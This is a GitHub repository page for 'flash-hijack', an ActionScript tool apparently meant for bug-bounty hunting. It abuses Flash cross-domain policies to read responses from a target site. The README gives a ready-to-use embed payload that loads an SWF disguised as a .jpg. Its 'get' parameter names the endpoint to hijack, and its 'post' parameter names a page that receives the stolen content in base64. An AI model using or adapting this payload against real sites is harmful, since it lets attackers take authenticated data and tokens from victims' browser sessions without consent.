Flash hijacking tool: CSRF, hijacking, redirects, SWF. Open an issue if you have a request. SRC bug hunting, response hijacking.
ActionScript
Type Name Latest commit message Commit time
jump Update README.md Jul 25, 2019
README.md Maybe this makes it easier to understand Aug 6, 2019
hijack.as Add files via upload May 30, 2019
hijack.jpg Add files via upload May 30, 2019
hijack.swf Add files via upload May 30, 2019

README.md

flash-hijack

A Flash hijacking tool.

Usage (HTML):

<div> <embed src="http://www.baidu.com/hijack.jpg?jpg=http://127.0.0.1/1.png&get=http://127.0.0.1/l.php&post=http://127.0.0.1/2.php" width="970" height="107" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" wmode="transparent"></embed> </div>

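Parameters:

jpg: an image on the target domain. It is requested first so that crossdomain.xml is loaded ahead of time; otherwise, if the hijacked endpoint loads too slowly, the hijack fails.

get: the endpoint or page to hijack.

post: the page that receives the hijacked content, which is transmitted as base64.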

Article: https://zhuanlan.zhihu.com/p/67484852
